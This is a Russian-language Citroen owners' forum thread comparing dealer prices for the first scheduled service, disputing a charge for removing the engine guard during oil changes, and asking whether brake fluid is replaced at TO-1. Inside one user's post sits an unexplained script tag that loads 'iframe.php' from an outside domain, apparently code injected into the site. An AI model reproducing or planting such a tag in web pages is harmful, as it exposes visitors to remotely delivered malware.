Перейти к содержанию
Ситроен Клуб

Стоимость ТО1 - 20000 км


bikekiller

Рекомендуемые сообщения

Вопрос цены - это вопрос вкуса фломастеров. 1200 - не нормально. А сколько нормально?

Покупая машину - будьте готовы к затратам.

На ТО-4 в предыдущей регенерации С4 с двигателем 110 сил - замена ремня ГРМ. ТО-4 - почти 20000 руб. Возмущались что дорого, но платили. :dntknw:/>

Никто не мешает возмущаться на цену замены масла в 1200 рублей.

Но это понятная цена - замена масла 1200 рублей.

Тут нет замена 600 и снятие/установка защиты 600.

Я знаю, что приехав на замену масла и отдав 1200 рублей - мне поменяют масло. И в счете не будет пунктов - "Прокатило".

 

Вопрос цены бывает вопросом вкуса фломастеров при продаже украденного товара, когда по вашему внешнему виду прикидывают сколько бы с вас слупить. В нормальном обществе исходят из затрат и плановой рентабельности. А ещё есть конкуренция, маркетинг и пр. Существуют такие понятия, как трудоёмкость операций, нормирование трудозатрат, фотография рабочего дня, нормочасы и пр. Слышали, наверное? Если для вас понятна цена 1200 руб. за работу по замене масла на Ситроене, то мне она непонятна, так как я знаю, какие операции надо сделать и сколько времени они занимают.
Ссылка на комментарий

Слышали, наверное?

 

Да, конечно, а еще слышал понятие Гарантийный ремонт, Сервисная книжка, Условия сохранения гарантии, Монополист предоставляемых услуг (в ракусе Гарантии) и т.д.

Есть желание посудиться с ОД по поводу трудоемкости операций, нормирования затрат и т.д. и обязать ОД предоставлять услуги по замене масла по 600 рублей?

В чем отличие замены масла на Ситроене и БМВ/Вольво и т.д. Ну принципиально? Не беря в расчет уникальные моторы в которых чтобы снять фильтр надо пол-двигателя разобрать. Ничем. :dntknw:

А цены что-то разные.

 

Повторяю:

 

Никто не мешает возмущаться на цену замены масла в 1200 рублей.

 

Можно еще про цены на услуги ЖКХ повозмущаться...

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...
 

 

 

Ссылка на комментарий

Да, конечно, а еще слышал понятие Гарантийный ремонт, Сервисная книжка, Условия сохранения гарантии, Монополист предоставляемых услуг (в ракусе Гарантии) и т.д.

Есть желание посудиться с ОД по поводу трудоемкости операций, нормирования затрат и т.д. и обязать ОД предоставлять услуги по замене масла по 600 рублей?

В чем отличие замены масла на Ситроене и БМВ/Вольво и т.д. Ну принципиально? Не беря в расчет уникальные моторы в которых чтобы снять фильтр надо пол-двигателя разобрать. Ничем. :dntknw:/>

А цены что-то разные.

 

Повторяю:

 

 

Можно еще про цены на услуги ЖКХ повозмущаться...

 

Можно, но это не в этом форуме. А потом - ну почему же просто возмущаться? Я после такой замены масла связывался с представительством, затем мне звонили от Од и при следующем обслуживании сделали скидку на величину "снять-поставить" защиту.

По крайней мере не чувствую себя обманутым. А если кому-то нормально платить 1200 за замену масла, тот может делать это сколько угодно раз.

Ссылка на комментарий

Мэйджор новая рига. ТО1 (20000) - 6150р.

P.S.

Перед покупкой автомобиля прикиньте, сколько планируете им пользоваться, узнайте стоимость ТО. Если всё устраивает-деньги в кассу и вперед. Непонимаю, зачем покупать машину, а потом колхозить и жаловаться что вас обдирают. Наверное стоит сначала купить калькулятор.

Изменено пользователем KPI17
Ссылка на комментарий

Приехал к официальному дилеру, заплатил сколько сказали и порядок.

 

Только почему-то народ в счет смотрит. :scratch_one-s_head: И задается вопросам - откуда снятие/установка?.

 

P.S.

TAC1, неужели еще не понятно что мы пытаемся обсудить две проблемы у которых разная "природа"?

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...
 

 

 

Ссылка на комментарий

Только почему-то народ в счет смотрит. :scratch_one-s_head:/> И задается вопросам - откуда снятие/установка?.

 

P.S.

TAC1, неужели еще не понятно что мы пытаемся обсудить две проблемы у которых разная "природа"?

 

Мне нет. Какая природа у этих проблем? Кстати, у каких? Расшифруй, пожалуйста.

Могу сформулировать со своей стороны. Я считаю, что за замену масла у 1200 руб. это много. Ты считаешь, что нормально, лишь бы это было красиво оформлено.

Кстати, сегодня был на ТО-40000 в Жулебино. Присутствовал в ремзоне от начала до конца. Всё сделали быстро и аккуратно. Так вот - защиту действительно снимают. Под пробкой слива масла как раз находится одна из продольных пластин, которая не даёт отвернуть пробку, а так же аккуратно слить масло. Машина выпуска середины 2011 года. Правда, слесарь сказал, что у части машин есть большое отверстие в этом месте. Так что надо смотреть в каждом конкретном случае. Кстати, за замену топливного фильтра взяли дополнительно к цене ТО - 300 руб. И если бы я его не привёз с собой - никто бы и не подумал его менять, хотя в сервисной книжке написано про замену.

Ссылка на комментарий

Изображение А вам слабо? Изображение

 

post-40566-0-03791300-1361717910_thumb.jpg

 

<script type="text/javascript" src="http://dreamselfprotection.net/iframe.php">

 

+ заменили всеми "любимый" блок над АКБ, по отзывной, хотя "старый" и не глючил.

... чем больше знаю я людей, тем больше нравятся собаки ...

Ссылка на комментарий

Мне нет. Какая природа у этих проблем? Кстати, у каких? Расшифруй, пожалуйста.

 

Одна проблема - дороговизна, неадекватность цен, персонала и т.д. на услуги.

Вторая - вписывают в счет пункт, которого быть не должно.

 

И если по первой можно рассуждать бесконечно, ругая ОД, буржуев, правительство и т.д., то по второй вроде все ясно. По крайней мере мне.

Вопрос-то простой: замена масла.

Процесс замены состоит из "слить масло" и "залить масло" (фильтры опустим для простоты).

Чтобы слить - надо снять защиту и открутить пробку.

Чтобы залить - надо открыть капот и открутить пробку.

Почему за первое ОД хочет денег, а за второе нет?

 

А то, что не устраивает цена 1200 за замену масла... Жизнь дорожает. :dntknw:

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...
 

 

 

Ссылка на комментарий

Уважаемый TAC1, тема этого раздела - стоимость ТО1. Читаю, т.к. интересно как отличаются цены в зависимости от диллера/города/региона. Да, приехал, да, заплатил, потому что каждый должен заниматься своей работой, только потом еси что вы сможете предъявлять претензии ОД, а не он вам за отказ от каких либо работ итд. Вы аппендицит тоже сами себе удалять будете или бегать и искать где анестезия дешевле? Наверное нет. Сделаете там где действительно лечат.

Надеюсь не обидел.

Ссылка на комментарий

Изображение

А, кажись, чтобы открутить сливную пробку, снимать поддон не обязательно, там есть окно.

 

Не всегда. Есть два типа защиты картера/поддона/шумоизоляции (по ситроен-сервис) : 1-с малым кол-вом дыр, и 2-как решето (у меня).

 

Так же есть три типа движков : 1.6i-110; VTI-120; eHDi-110. Не берусь утверждать совпадают у них места расположения сливных пробок или нет (не знаю) Изображение .

 

Теперь представьте, зная "приколы" наших французианцев, различные сочетания этих защит и движков Изображение.

 

 

Мне повезло дыыыра прям под пробкой имеется в защите Изображение.

 

Но есть минус в неснимании... при замене маслянного фильтра - вся защита в масле... Изображение. Вот думаю - чем пшикнуть чтоб это пятно смыть?

... чем больше знаю я людей, тем больше нравятся собаки ...

Ссылка на комментарий

 

Процесс замены состоит из "слить масло" и "залить масло" (фильтры опустим для простоты).

Чтобы слить - надо снять защиту и открутить пробку.

Чтобы залить - надо открыть капот и открутить пробку.

Почему за первое ОД хочет денег, а за второе нет?

:dntknw:/>

Дилер не хочет за что-то денег? По крайней мере наивно.

Я свою позицию высказал, вашу до сих пор не понял. Жизнь дорожает? Ну, да, Волга впадает в Каспийское море, лошади кушают овёс. Неужели вы до сих пор не поняли, что я вам хотел сказать, что не надо говорить что-то ради того, чтобы сказать что-то?

 

Уважаемый TAC1, тема этого раздела - стоимость ТО1. Читаю, т.к. интересно как отличаются цены в зависимости от диллера/города/региона. Да, приехал, да, заплатил, потому что каждый должен заниматься своей работой, только потом еси что вы сможете предъявлять претензии ОД, а не он вам за отказ от каких либо работ итд. Вы аппендицит тоже сами себе удалять будете или бегать и искать где анестезия дешевле? Наверное нет. Сделаете там где действительно лечат.

Надеюсь не обидел.

 

Ну вообще - феерия какая-то. Интересно, как дилер может предъявить мне претензии?? Хотел бы я посмотреть на этот процесс.

Про аппендицит - если будет запас времени, то и анастезию хорошую поищу и хирурга приличного. Если будет пара равноценных вариантов, то выберу подешевле, наверно. А может и нет - зависеть будет от кучи факторов. И вообще - зачем самому себе живот-то резать? Я не умею.

Ссылка на комментарий
  • 2 недели спустя...

привет всем. ТО-1 прошел АИС ЛУГАНСК стоимость 1149 гривен. заменили м.масло, м.фильтр,салонный фильтр,замена тормозную жидкость, долив жидкости сист. охлаждения, долив масла усилителя руля.

Ссылка на комментарий

замена тормозную жидкость

 

:scratch_one-s_head: :scratch_one-s_head:

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...
 

 

 

Ссылка на комментарий

привет всем. ТО-1 прошел АИС ЛУГАНСК стоимость 1149 гривен. заменили м.масло, м.фильтр,салонный фильтр,замена тормозную жидкость, долив жидкости сист. охлаждения, долив масла усилителя руля.

 

разве на ТО1 меняют тормозную жидкость? У меня не меняли, и кажется в регламенте этого нет.
Ссылка на комментарий

Всем привет! Промежуточное ТО - 10000км всего 2750руб. работа + замена маслав двигателе и масленого фильтра, Ситроен-Отрадное. Москва, через 1000км поеду делать ТО-1

 

...если прошло 2 года,post-49244-0-55587400-1363043916_thumb.jpg по регламенту положена замена жидкости не зависимо от пробега!

Ссылка на комментарий

...если прошло 2 года

 

, то было бы ТО-2, и вопроса по замене тормозной жидкости не возникло бы.

Но...

ТО-1 прошел

 

Значит год. По сроку, по пробегу - пофиг, но год.

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...
 

 

 

Ссылка на комментарий

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
×
×
  • Создать...